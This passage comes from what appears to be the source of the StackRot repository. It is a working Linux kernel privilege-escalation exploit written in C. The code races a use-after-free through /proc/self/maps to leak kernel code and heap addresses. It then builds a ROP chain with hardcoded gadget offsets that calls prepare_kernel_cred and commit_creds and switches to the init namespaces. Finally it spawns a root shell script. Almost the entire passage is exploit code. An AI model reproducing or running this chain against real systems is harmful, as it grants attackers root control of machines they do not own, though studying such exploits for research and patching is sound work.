happens before \"free\", aborting\n", 330 | stderr); 331 | return -1; 332 | } 333 | 334 | static int __do_exp(void) 335 | { 336 | int retval; 337 | 338 | fprintf(stderr, L_DOING "[ ] Trying with free_timing_msec=%d\n", 339 | free_timing_msec); 340 | 341 | healthcheck_state = HEALTHCHECK_INIT; 342 | reset_maps(); 343 | 344 | sched_yield(); 345 | retry: 346 | retval = setup_nodes(); 347 | if (retval < 0) 348 |
return retval; 349 | 350 | if (check_nodes() != 0) { 351 | teardown_nodes(); 352 | sched_yield(); 353 | goto retry; 354 | } 355 | 356 | prepare_fengshui(); 357 | 358 | retval = waitpid(nodes[LUCKY_TASK_ID], NULL, __WCLONE | WSTOPPED); 359 | if (retval < 0) 360 | perror(L_ERROR "[-] Cannot wait for the \"free\" node"); 361 | 362 | kill_node(LUCKY_TASK_ID, SIGCONT); 363 | wait_node(LUCKY_TASK_ID); 364 | 365 | teardown_nodes(); 366 | 367 | if (free_timing_msec == 0) 368 | return verify_healthcheck_state(); 369 | else 370 | return warn_healthcheck_state(); 371 | } 372 | 373 | #define FREE_TIMING_INIT 50 374 | #define FREE_TIMING_RATIO 5 375 | #define FREE_TIMING_STEP 5 376 | 377 | static int __do_first_exp(void) 378 | { 379 | int retval; 380 | int msec; 381 | 382 | free_timing_msec = 0; 383 | retval = __do_exp(); 384 | if (retval < 0) 385 | return retval; 386 | 387 | for (msec = FREE_TIMING_INIT;; msec += msec / FREE_TIMING_RATIO) { 388 | free_timing_msec = msec; 389 | retval = __do_exp(); 390 | if (retval < 0) 391 | return retval; 392 | if (exploit_results[0] != 0) 393 | return 0; 394 | } 395 | } 396 | 397 | static int __do_next_exp(void) 398 | { 399 | int retval; 400 | int msec, initial_timing; 401 | 402 | initial_timing = free_timing_msec; 403 | 404 | for (msec = 0;; msec += FREE_TIMING_STEP) { 405 | free_timing_msec = initial_timing + msec; 406 | retval = __do_exp(); 407 | if (retval < 0) 408 | return retval; 409 | if (exploit_results[0] != 0) 410 | return 0; 411 | 412 | if (msec == 0 || msec > initial_timing) 413 | continue; 414 | 415 | free_timing_msec = initial_timing - msec; 416 | retval = __do_exp(); 417 | if (retval < 0) 418 | return retval; 419 | if (exploit_results[0] != 0) 420 | return 0; 421 | } 422 | } 423 | 424 | static int do_exp(unsigned long target_address) 425 | { 426 | exploit_address = target_address; 427 | stack_expansion_victim = ADDR_VICTIM - 1; 428 | 429 | exploit_results[0] = 0; 430 | 431 | if (free_timing_msec == 0) 432 | return 
__do_first_exp(); 433 | else 434 | return __do_next_exp(); 435 | } 436 | 437 | #define IDT_BASE_ADDR 0xfffffe0000000000ul 438 | #define IDT_ENTRY_SIZE 16 439 | #define IDT_ENTRY_NUM 256 440 | 441 | #define IDT_LAST_ENTRY (IDT_BASE_ADDR + (IDT_ENTRY_NUM - 1) * IDT_ENTRY_SIZE) 442 | 443 | static unsigned long leaked_code_addr; 444 | 445 | static int __exp_leak_code(void) 446 | { 447 | unsigned long v0, v1, v; 448 | int retval; 449 | 450 | retval = do_exp(IDT_LAST_ENTRY); 451 | if (retval < 0) 452 | return retval; 453 | 454 | v0 = exploit_results[0]; 455 | v1 = exploit_results[1]; 456 | v = (v0 & 0xFFFF) | ((v0 >> 32) & (0xFFFF0000)) | (v1 << 32); 457 | 458 | fprintf(stderr, L_DONE "[+] Leaked code address: %lx\n", v); 459 | leaked_code_addr = v; 460 | 461 | return 0; 462 | } 463 | 464 | #define __OFF_asm_sysvec_spurious_apic_interrupt 0xffffffff81e00cd0 465 | #define __OFF_node_data 0xffffffff82814ea0 466 | 467 | static unsigned long leaked_heap_addr; 468 | 469 | static int __exp_leak_heap(void) 470 | { 471 | unsigned long v; 472 | int retval; 473 | 474 | v = leaked_code_addr - __OFF_asm_sysvec_spurious_apic_interrupt + 475 | __OFF_node_data; 476 | retval = do_exp(v); 477 | if (retval < 0) 478 | return retval; 479 | 480 | v = exploit_results[0]; 481 | 482 | fprintf(stderr, L_DONE "[+] Leaked heap address: %lx\n", v); 483 | leaked_heap_addr = v; 484 | 485 | return 0; 486 | } 487 | 488 | extern void get_shell(void); 489 | 490 | asm(".section .rodata\n\t" 491 | "msg: .string \"" A_SUCC "[*] Got root! 
" 492 | "Run /tmp/exp/as_root.sh\\n" A_RESET "\"\n\t" 493 | "msg_end:\n\t" 494 | "\n\t" 495 | "sh_cmd: .string \"/tmp/exp/as_root.sh\"\n\t" 496 | "sh_arg: .quad sh_cmd\n\t" 497 | " .quad 0\n\t" 498 | "\n\t" 499 | ".section .text\n\t" 500 | "get_shell:\n\t" 501 | "movq $1, %rax\n\t" /* __NR_write */ 502 | "movq $2, %rdi\n\t" /* stderr */ 503 | "leaq msg(%rip), %rsi\n\t" 504 | "movq $msg_end - msg, %rdx\n\t" 505 | "syscall\n\t" 506 | "movq $59, %rax\n\t" /* __NR_execve */ 507 | "leaq sh_cmd(%rip), %rdi\n\t" 508 | "leaq sh_arg(%rip), %rsi\n\t" 509 | "xorq %rdx, %rdx\n\t" 510 | "syscall\n\t" 511 | "ud2\n\t"); 512 | 513 | static unsigned long page_kernel_addr; 514 | static void *page_userspace_ptr; 515 | 516 | static unsigned long kcode_base_addr; 517 | static unsigned long curr_stack_offset; 518 | 519 | static void __exp_rop_entry(void) 520 | { 521 | #define WR_ABS(off, val) \ 522 | (*(unsigned long *)(page_userspace_ptr + (off)) = (val)) 523 | #define WR_REL(off, val) \ 524 | (*(unsigned long *)(page_userspace_ptr + (off)) = \ 525 | page_kernel_addr + (val)) 526 | #define WR_SYM(off, val) \ 527 | (*(unsigned long *)(page_userspace_ptr + (off)) = \ 528 | kcode_base_addr + (val)) 529 | 530 | WR_REL(96 /* vma_area_struct->vm_ops */, -8 /* vm_ops */); 531 | 532 | WR_SYM(-8 /* vm_ops */ + 96 /* vma_ops->name */, 533 | 0xffffffff8122e544 /* movq %rbx, %rsi; 534 | * movq %rbp, %rdi; 535 | * call ffffffff82003260 <__x86_indirect_thunk_r13> */); 536 | 537 | WR_SYM(16 /* indirect jump: %r13 (vma_area_struct->mm) */, 538 | 0xffffffff81b828a4 /* pushq %rsi; jmp 46(%rsi) */); 539 | 540 | WR_SYM(46 /* indirect jump: 46(%rsi) */, 541 | 0xffffffff8195b260 /* popq %rsp; ret */); 542 | 543 | WR_SYM(0 /* stack(%rsp=%rdi): ret */, 544 | 0xffffffff8195b260 /* popq %rsp; ret */); 545 | 546 | WR_REL(8 /* stack(%rsp): popq %rsp */, 128 /* new stack */); 547 | 548 | curr_stack_offset = 128; 549 | 550 | #define ST_ABS(val) \ 551 | (*(unsigned long *)(page_userspace_ptr + curr_stack_offset) = 
(val)); \ 552 | curr_stack_offset += 8 553 | #define ST_REL(val) \ 554 | (*(unsigned long *)(page_userspace_ptr + curr_stack_offset) = \ 555 | page_kernel_addr + curr_stack_offset + (val)); \ 556 | curr_stack_offset += 8 557 | #define ST_SYM(val) \ 558 | (*(unsigned long *)(page_userspace_ptr + curr_stack_offset) = \ 559 | kcode_base_addr + (val)); \ 560 | curr_stack_offset += 8 561 | } 562 | 563 | static void __exp_rop_cred(void) 564 | { 565 | ST_SYM(0xffffffff81021465 /* popq %rdi; ret */); 566 | 567 | ST_SYM(0xffffffff82814a40 /* init_task */); 568 | 569 | ST_SYM(0xffffffff8109ba00 /* prepare_kernel_cred */); 570 | 571 | ST_SYM(0xffffffff81021465 /* popq %rdi; ret */); 572 | 573 | ST_REL(24 /* %rsp + 24 */); 574 | 575 | ST_SYM(0xffffffff814219af /* movq %rax, (%rdi); 576 | * jmp ffffffff82003300 <__x86_return_thunk> */); 577 | 578 | ST_SYM(0xffffffff81021465 /* popq %rdi; ret */); 579 | 580 | ST_ABS(0xAABBCCDD /* dummy value */); 581 | 582 | ST_SYM(0xffffffff8109b760 /* commit_creds */); 583 | } 584 | 585 | static void __exp_rop_nsproxy(void) 586 | { 587 | ST_SYM(0xffffffff81021465 /* popq %rdi; ret */); 588 | 589 | ST_ABS(1 /* pid */); 590 | 591 | ST_SYM(0xffffffff81094140 /* find_task_by_vpid */); 592 | 593 | ST_SYM(0xffffffff81021465 /* popq %rdi; ret */); 594 | 595 | ST_REL(24 /* %rsp + 24 */); 596 | 597 | ST_SYM(0xffffffff814219af /* movq %rax, (%rdi); 598 | * jmp ffffffff82003300 <__x86_return_thunk> */); 599 | 600 | ST_SYM(0xffffffff81021465 /* popq %rdi; ret */); 601 | 602 | ST_ABS(0xAABBCCDD /* dummy value */); 603 | 604 | ST_SYM(0xffffffff810aa0ed /* popq %rsi; ret */); 605 | 606 | ST_SYM(0xffffffff828517a0 /* init_nsproxy */); 607 | 608 | ST_SYM(0xffffffff81099cb0 /* switch_task_namespaces */); 609 | } 610 | 611 | static void __exp_rop_unlock(void) 612 | { 613 | ST_SYM(0xffffffff81123074 /* popq %rax; ret */); 614 | 615 | ST_SYM(0xffffffff81123074 /* popq %rax; ret */); 616 | 617 | ST_SYM(0xffffffff81002cf4 /* movq %rbp, %rdi; 618 | * call 
0xffffffff820030c0 <__x86_indirect_thunk_array> */); 619 | 620 | ST_SYM(0xffffffff812b1240 /* m_stop */); 621 | } 622 | 623 | static void __exp_rop_exit(void) 624 | { 625 | ST_SYM(0xffffffff81e00ed0 /* swapgs_restore_regs_and_return_to_usermode */); 626 | 627 | ST_ABS(0 /* r15 */); 628 | ST_ABS(0 /* r14 */); 629 | ST_ABS(0 /* r13 */); 630 | ST_ABS(0 /* r12 */); 631 | ST_ABS(0 /* rbp */); 632 | ST_ABS(0 /* rbx */); 633 | ST_ABS(0 /* r11 */); 634 | ST_ABS(0 /* r10 */); 635 | ST_ABS(0 /* r9 */); 636 | ST_ABS(0 /* r8 */); 637 | ST_ABS(0 /* rax */); 638 | ST_ABS(0 /* rcx */); 639 | ST_ABS(0 /* rdx */); 640 | ST_ABS(0 /* rsi */); 641 | ST_ABS(0 /* rdi */); 642 | 643 | ST_ABS(0 /* ??? */); 644 | ST_ABS((unsigned long)&get_shell /* rip */); 645 | ST_ABS(0x33 /* cs */); 646 | ST_ABS(0x246 /* eflags */); 647 | ST_ABS(0xCCCC1234 /* rsp */); 648 | ST_ABS(0x2b /* ss */); 649 | } 650 | 651 | static void __exp_prep_rop(void) 652 | { 653 | kcode_base_addr = 654 | leaked_code_addr - __OFF_asm_sysvec_spurious_apic_interrupt; 655 | 656 | __exp_rop_entry(); 657 | 658 | __exp_rop_cred(); 659 | 660 | __exp_rop_nsproxy(); 661 | 662 | __exp_rop_unlock(); 663 | 664 | __exp_rop_exit(); 665 | } 666 | 667 | #define ROP_OFFSET 0x100 668 | 669 | static int __exp_kern_exec(void) 670 | { 671 | int retval; 672 | 673 | page_kernel_addr = (leaked_heap_addr & ~PAGE_MASK) + ROP_OFFSET; 674 | page_userspace_ptr = &vma_page[ROP_OFFSET]; 675 | 676 | __exp_prep_rop(); 677 | 678 | retval = forge_evil_vma(); 679 | if (retval < 0) 680 | return retval; 681 | 682 | retval = do_exp(page_kernel_addr); 683 | if (retval < 0) 684 | return retval; 685 | 686 | return 0; 687 | } 688 | 689 | #define PAUSE_MSEC 200 690 | 691 | static int do_exploiting(void) 692 | { 693 | int retval; 694 | 695 | msleep(PAUSE_MSEC); 696 | retval = __exp_leak_code(); 697 | if (retval < 0) 698 | return retval; 699 | 700 | msleep(PAUSE_MSEC); 701 | retval = __exp_leak_heap(); 702 | if (retval < 0) 703 | return retval; 704 | 705 |
setup_nodes(); 706 | teardown_nodes(); 707 | synchronize_rcu(); 708 | 709 | msleep(PAUSE_MSEC); 710 | retval = __exp_kern_exec(); 711 | if (retval < 0) 712 | return retval; 713 | 714 | return 0; 715 | } 716 | 717 | static int run_node_master(void) 718 | { 719 | int retval; 720 | 721 | retval = setup_maps(); 722 | if (retval < 0) 723 | return retval; 724 | 725 | retval = setup_vma_msq(); 726 | if (retval < 0) 727 | return retval; 728 | 729 | retval = do_exploiting(); 730 | 731 | cleanup_vma_msq(); 732 | 733 | return retval; 734 | } 735 | -------------------------------------------------------------------------------- /exp/src/node_use.c: -------------------------------------------------------------------------------- 1 | #include "../nolibc/nolibc.h" 2 | #include "../consts/log.h" 3 | #include "../sys/uio.h" 4 | #include "../utils/string.h" 5 | #include "nodes_master_free_use.h" 6 | #include "nodes_master_and_use.h" 7 | #include "nodes_free_and_use.h" 8 | 9 | #define BUFSZ_PROC_MAPS 1024 10 | static char buf_proc_maps[BUFSZ_PROC_MAPS]; 11 | 12 | #define FAKE_BUFFER_ADDR ((void *)1) 13 | #define FAKE_BUFFER_SIZE (1024 * 1024 * 1024) 14 | 15 | static int __gen_proc_maps(void) 16 | { 17 | int fd, err; 18 | struct iovec iov; 19 | long retval; 20 | 21 | fd = fd_proc_maps; 22 | err = 0; 23 | 24 | retval = read(fd, buf_proc_maps, BUFSZ_PROC_MAPS); 25 | if (retval < 0) { 26 | err = 1; 27 | perror(L_ERROR 28 | "[-] Cannot read from \"/proc/self/maps\" (initialize the kernel buffer)"); 29 | } 30 | 31 | uaf_ready_to_go = 1; 32 | 33 | iov.iov_base = FAKE_BUFFER_ADDR; 34 | iov.iov_len = FAKE_BUFFER_SIZE; 35 | 36 | retval = readv(fd, &iov, 1); 37 | if (retval < 0 && errno != EFAULT) { 38 | err = 1; 39 | perror(L_ERROR 40 | "[-] Cannot read from \"/proc/self/maps\" (fill the kernel buffer)"); 41 | } 42 | 43 | return err ? 
-1 : 0; 44 | } 45 | 46 | static int __load_proc_maps(void) 47 | { 48 | int fd; 49 | long retval; 50 | 51 | fd = fd_proc_maps; 52 | 53 | for (;;) { 54 | retval = read(fd, buf_proc_maps, BUFSZ_PROC_MAPS - 1); 55 | if (retval > 0) 56 | buf_proc_maps[retval] = 0; 57 | else 58 | break; 59 | } 60 | 61 | if (retval < 0) { 62 | perror(L_ERROR 63 | "[-] Cannot read from \"/proc/self/maps\" (copy to the userspace buffer)"); 64 | return retval; 65 | } 66 | 67 | return 0; 68 | } 69 | 70 | static void load_proc_maps(void) 71 | { 72 | int retval; 73 | 74 | retval = __gen_proc_maps(); 75 | if (retval < 0) 76 | exit(-1); 77 | 78 | if (healthcheck_state == HEALTHCHECK_FREE) 79 | ++healthcheck_state; 80 | fputs(L_DOING "[ ] UAF state update: \"use\" has been completed\n", 81 | stderr); 82 | 83 | retval = __load_proc_maps(); 84 | if (retval < 0) 85 | exit(-1); 86 | 87 | puts(buf_proc_maps); 88 | } 89 | 90 | static int check_no_vsyscall(const char *line, const char *nline) 91 | { 92 | const char *s; 93 | 94 | for (s = line; s < nline; ++s) 95 | if (starts_with(s, "[vsyscall]")) 96 | return -1; 97 | 98 | return 0; 99 | } 100 | 101 | static void __parse_proc_maps(const char *line) 102 | { 103 | unsigned long v1, v2; 104 | const char *s, *t; 105 | 106 | s = parse_hex(line, &v1); 107 | if (s == line) { 108 | fputs(L_ERROR 109 | "[-] Cannot parse memory maps: Invalid start address\n", 110 | stderr); 111 | exit(-1); 112 | } 113 | 114 | if (*s != '-') { 115 | fputs(L_ERROR 116 | "[-] Cannot parse memory maps: Invalid separator between addresses\n", 117 | stderr); 118 | exit(-1); 119 | } 120 | ++s; 121 | 122 | t = parse_hex(s, &v2); 123 | if (t == s) { 124 | fputs(L_ERROR 125 | "[-] Cannot parse memory maps: Invalid end addresses\n", 126 | stderr); 127 | exit(-1); 128 | } 129 | 130 | fprintf(stderr, 131 | L_DONE "[+] Parsed from memory maps: word %lx, word %lx\n", v1, 132 | v2); 133 | exploit_results[0] = v1; 134 | exploit_results[1] = v2; 135 | } 136 | 137 | static void parse_proc_maps(void) 
138 | { 139 | const char *line, *nline, *nnline; 140 | int retval; 141 | 142 | line = next_line(buf_proc_maps); 143 | if (!line || !*line) { 144 | fputs(L_ERROR 145 | "[-] Unexpected memory map format: No second line\n", 146 | stderr); 147 | exit(-1); 148 | } 149 | 150 | nline = next_line(line); 151 | if (!nline || !*nline) { 152 | fputs(L_ERROR 153 | "[-] Unexpected memory map format: No third line\n", 154 | stderr); 155 | exit(-1); 156 | } 157 | 158 | nnline = next_line(nline); 159 | if (nnline && *nnline) { 160 | fputs(L_ERROR 161 | "[-] Unsuccessful exploit trial: Memory maps contain the fourth line\n", 162 | stderr); 163 | exit(-1); 164 | } 165 | 166 | retval = check_no_vsyscall(line, nline); 167 | if (retval < 0) { 168 | fputs(L_ERROR 169 | "[-] Unsuccessful exploit trial: Memory maps contain the [vsyscall] line\n", 170 | stderr); 171 | exit(-1); 172 | } 173 | 174 | __parse_proc_maps(line); 175 | } 176 | 177 | static int run_node_use(void) 178 | { 179 | load_proc_maps(); 180 | 181 | parse_proc_maps(); 182 | 183 | return 0; 184 | } 185 | -------------------------------------------------------------------------------- /exp/src/nodes_decl.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | static int run_node_master(void); 4 | static int run_node_use(void); 5 | static int run_node_free(void); 6 | -------------------------------------------------------------------------------- /exp/src/nodes_free_and_use.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | static volatile int fd_proc_maps; 4 | 5 | static volatile int uaf_ready_to_go; 6 | -------------------------------------------------------------------------------- /exp/src/nodes_master_and_free.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | static void *stack_expansion_victim; 4 | 5 | static volatile int free_timing_msec; 6 | static 
volatile unsigned long exploit_address; 7 | -------------------------------------------------------------------------------- /exp/src/nodes_master_and_use.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | static volatile unsigned long exploit_results[2]; 4 | -------------------------------------------------------------------------------- /exp/src/nodes_master_free_use.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #define HEALTHCHECK_INIT 0 4 | #define HEALTHCHECK_FREE 1 5 | #define HEALTHCHECK_DONE 2 6 | 7 | static _Atomic int healthcheck_state; 8 | -------------------------------------------------------------------------------- /exp/sys/msg.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "../nolibc/nolibc.h" 3 | #include 4 | 5 | typedef int key_t; 6 | 7 | static int msgget(key_t key, int msgflg) 8 | { 9 | int retval; 10 | 11 | retval = my_syscall2(__NR_msgget, key, msgflg); 12 | if (retval < 0) { 13 | SET_ERRNO(-retval); 14 | retval = -1; 15 | } 16 | 17 | return retval; 18 | } 19 | 20 | static int msgsnd(int msqid, const void *msgp, size_t msgsz, int msgflg) 21 | { 22 | int retval; 23 | 24 | retval = my_syscall4(__NR_msgsnd, msqid, msgp, msgsz, msgflg); 25 | if (retval < 0) { 26 | SET_ERRNO(-retval); 27 | retval = -1; 28 | } 29 | 30 | return retval; 31 | } 32 | 33 | static int msgctl(int msqid, int cmd, struct msqid_ds *buf) 34 | { 35 | int retval; 36 | 37 | retval = my_syscall3(__NR_msgctl, msqid, cmd, buf); 38 | if (retval < 0) { 39 | SET_ERRNO(-retval); 40 | retval = -1; 41 | } 42 | 43 | return retval; 44 | } 45 | -------------------------------------------------------------------------------- /exp/sys/uio.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "../nolibc/nolibc.h" 3 | #include 4 | 5 | static long 
readv(int fildes, const struct iovec *iov, int iovcnt) 6 | { 7 | long retval; 8 | 9 | retval = my_syscall3(__NR_readv, fildes, iov, iovcnt); 10 | if (retval < 0) { 11 | SET_ERRNO(-retval); 12 | retval = -1; 13 | } 14 | 15 | return retval; 16 | } 17 | -------------------------------------------------------------------------------- /exp/sysutil/clone.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "../nolibc/nolibc.h" 3 | #include 4 | 5 | typedef int (*clone_cb_t)(void); 6 | 7 | static pid_t __clone(struct clone_args *cl_args, clone_cb_t cb) 8 | { 9 | pid_t retval; 10 | 11 | asm volatile("syscall\n\t" 12 | "testq %%rax, %%rax\n\t" 13 | "jnz 0f\n\t" 14 | "movq $39, %%rax\n\t" /* __NR_getpid */ 15 | "syscall\n\t" 16 | "movq %%rax, %%rdi\n\t" 17 | "movq $19, %%rsi\n\t" /* SIGSTOP */ 18 | "movq $62, %%rax\n\t" /* __NR_kill */ 19 | "syscall\n\t" 20 | "call *%4\n\t" 21 | "movq %%rax, %%rdi\n\t" 22 | "movq $60, %%rax\n\t" /* __NR_exit */ 23 | "syscall\n\t" 24 | "hlt\n\t" 25 | "0:\n\t" 26 | : "=a"(retval) 27 | : "a"(__NR_clone3), "D"(cl_args), 28 | "S"(sizeof(struct clone_args)), "r"(cb) 29 | : "rcx", "rdx", "r10", "r11", "r8", "r9", "memory"); 30 | 31 | if (retval < 0) { 32 | SET_ERRNO(-retval); 33 | retval = -1; 34 | } 35 | return retval; 36 | } 37 | 38 | static pid_t clone_same_vm(clone_cb_t cb, void *stack, unsigned long stack_size) 39 | { 40 | struct clone_args cl_args = {}; 41 | cl_args.flags = CLONE_FS | CLONE_FILES | CLONE_SYSVSEM | CLONE_SIGHAND | 42 | CLONE_VM; 43 | cl_args.stack = (long)stack; 44 | cl_args.stack_size = stack_size; 45 | 46 | return __clone(&cl_args, cb); 47 | } 48 | 49 | static pid_t clone_new_vm(clone_cb_t cb, void *stack, unsigned long stack_size) 50 | { 51 | struct clone_args cl_args = {}; 52 | cl_args.flags = CLONE_FS | CLONE_FILES | CLONE_SYSVSEM; 53 | cl_args.stack = (long)stack; 54 | cl_args.stack_size = stack_size; 55 | 56 | return __clone(&cl_args, cb); 57 | } 58 | 
-------------------------------------------------------------------------------- /exp/sysutil/mbarrier.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "../nolibc/nolibc.h" 3 | #include 4 | 5 | void synchronize_rcu(void) 6 | { 7 | int retval; 8 | 9 | retval = my_syscall3(__NR_membarrier, MEMBARRIER_CMD_GLOBAL, 0, -1); 10 | if (retval < 0) { 11 | SET_ERRNO(-retval); 12 | perror("rcu membarrier"); 13 | } 14 | } 15 | -------------------------------------------------------------------------------- /exp/sysutil/pin_cpu.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "../nolibc/nolibc.h" 3 | 4 | #define CPU_0 0 5 | #define CPU_1 1 6 | 7 | static int __pin_cpu(pid_t pid, unsigned int len, unsigned long *cpu_mask) 8 | { 9 | int retval; 10 | 11 | retval = my_syscall3(__NR_sched_setaffinity, pid, len, cpu_mask); 12 | if (retval < 0) { 13 | SET_ERRNO(-retval); 14 | retval = -1; 15 | } 16 | 17 | return retval; 18 | } 19 | 20 | static int pin_cpu2(pid_t pid, int cpu_id) 21 | { 22 | unsigned long cpu_mask; 23 | int retval; 24 | 25 | cpu_mask = 1UL << cpu_id; 26 | retval = __pin_cpu(pid, sizeof(cpu_mask), &cpu_mask); 27 | 28 | return retval; 29 | } 30 | 31 | static int pin_cpu(int cpu_id) 32 | { 33 | return pin_cpu2(getpid(), cpu_id); 34 | } 35 | -------------------------------------------------------------------------------- /exp/utils/string.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | static const char *next_line(const char *s) 4 | { 5 | while (*s && *s != '\n') 6 | ++s; 7 | return *s == '\n' ? s + 1 : NULL; 8 | } 9 | 10 | static const char *starts_with(const char *s, const char *t) 11 | { 12 | while (*t && *t++ == *s++) 13 | ; 14 | return *t ? 
NULL : s; 15 | } 16 | 17 | static const char *parse_hex(const char *s, unsigned long *r) 18 | { 19 | unsigned long v; 20 | char c; 21 | 22 | v = 0; 23 | while ((c = *s++)) { 24 | switch (c) { 25 | case 'A' ... 'F': 26 | v = v * 16 + (c - 'A') + 10; 27 | break; 28 | case 'a' ... 'f': 29 | v = v * 16 + (c - 'a') + 10; 30 | break; 31 | case '0' ... '9': 32 | v = v * 16 + (c - '0'); 33 | break; 34 | default: 35 | goto out; 36 | } 37 | } 38 | 39 | out: 40 | *r = v; 41 | return --s; 42 | } 43 | -------------------------------------------------------------------------------- /pic/node_master_code_leak.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lrh2000/StackRot/c50978a5730745f4fea1e02313242177a4f6bd9f/pic/node_master_code_leak.png -------------------------------------------------------------------------------- /pic/node_master_fengshui.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lrh2000/StackRot/c50978a5730745f4fea1e02313242177a4f6bd9f/pic/node_master_fengshui.png -------------------------------------------------------------------------------- /pic/node_master_heap_leak.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lrh2000/StackRot/c50978a5730745f4fea1e02313242177a4f6bd9f/pic/node_master_heap_leak.png -------------------------------------------------------------------------------- /pic/node_master_kern_exec.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lrh2000/StackRot/c50978a5730745f4fea1e02313242177a4f6bd9f/pic/node_master_kern_exec.png -------------------------------------------------------------------------------- /pic/nodes_free_and_use.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/lrh2000/StackRot/c50978a5730745f4fea1e02313242177a4f6bd9f/pic/nodes_free_and_use.png --------------------------------------------------------------------------------